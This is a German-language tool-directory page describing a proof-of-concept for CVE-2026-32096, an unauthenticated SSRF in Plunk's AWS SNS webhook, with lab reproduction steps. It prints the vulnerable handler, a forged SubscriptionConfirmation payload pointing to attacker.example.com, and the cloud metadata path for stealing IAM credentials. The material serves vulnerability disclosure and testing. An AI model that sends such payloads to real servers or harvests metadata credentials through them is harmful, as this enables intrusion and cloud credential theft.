Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-32096 — Proof-of-Concept-Exploit für eine SSRF-Schwachstelle im SNS-Webhook von Plunk, der eine nicht authentifizierte Server-Side Request Forgery über eine nicht validierte SubscribeURL demonstriert. | Kitploit
Tools/GitHubGitHub/andrebhu/cve-2026-32096
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubandrebhu/cve-2026-32096

CVE-2026-32096

Proof-of-Concept-Exploit für eine SSRF-Schwachstelle im SNS-Webhook von Plunk, der eine nicht authentifizierte Server-Side Request Forgery über eine nicht validierte SubscribeURL demonstriert.

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-32096

SSRF über unvalidierte AWS-SNS-SubscriptionConfirmation in useplunk/plunk

Zusammenfassung

Der Plunk-API-Endpunkt POST /webhooks/sns ruft eine vom Angreifer bereitgestellte SubscribeURL ab, ohne die kryptografische AWS-SNS-Signatur zu verifizieren. Ein nicht authentifizierter Angreifer kann den Server dazu zwingen, beliebige ausgehende HTTP-Anfragen zu senden (SSRF).

SchweregradKritisch — CVSS 9.3 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N)
CWECWE-918: Server-Side Request Forgery
Betroffene Dateiapps/api/src/controllers/Webhooks.ts
Authentifizierung erforderlichKeine

Verwundbarer Code

root@kitploit:~
// apps/api/src/controllers/Webhooks.ts
if (req.body.Type === 'SubscriptionConfirmation') {
  const confirmResponse = await fetch(req.body.SubscribeURL); // SSRF — keine Signaturvalidierung
  if (confirmResponse.ok) {
    return res.status(200).json({ success: true, message: 'Subscription confirmed' });
  }
}

Die minimale Payload besteht aus nur zwei Feldern:

root@kitploit:~
{
  "Type": "SubscriptionConfirmation",
  "SubscribeURL": "http://attacker.example.com/callback"
}

Auswirkungen

  • AWS EC2/ECS: Stehlen von IAM-Anmeldeinformationen über http://169.254.169.254/latest/meta-data/iam/security-credentials/
  • Interne Dienste: Zugriff auf Datenbanken, Redis, Kubernetes-API oder andere nicht über das Internet erreichbare Dienste
  • Port-Scanning: Aufzählung interner Ports über zeit- und fehlerbasierte Antworten

Reproduktion

Voraussetzungen

  • Docker & Docker Compose
  • Python 3

Schritte

  1. Plunk-Testumgebung starten:

    root@kitploit:~
    docker compose up -d
    
  2. SSRF-Callback-Listener starten:

    root@kitploit:~
    python3 listener.py
    
  3. Exploit ausführen:

    root@kitploit:~
    chmod +x exploit.sh
    ./exploit.sh
    
  4. Beobachten Sie den Callback-Treffer in der listener.py-Ausgabe, der bestätigt, dass der Server die vom Angreifer kontrollierte URL abgerufen hat.

Dateien

DateiBeschreibung
exploit.shEnd-to-End-Exploit-Skript — sendet gefälschte SNS-Payload an den verwundbaren Endpunkt
listener.pySSRF-Callback-Listener — erfasst und protokolliert eingehende Anfragen vom Plunk-Server
docker-compose.ymlMinimale Docker-Compose-Umgebung (Postgres, Redis, Plunk) für die lokale Reproduktion

Referenzen

  • AWS SNS: Verifying the signatures of Amazon SNS messages
  • OWASP SSRF Prevention Cheat Sheet
Tool herunterladen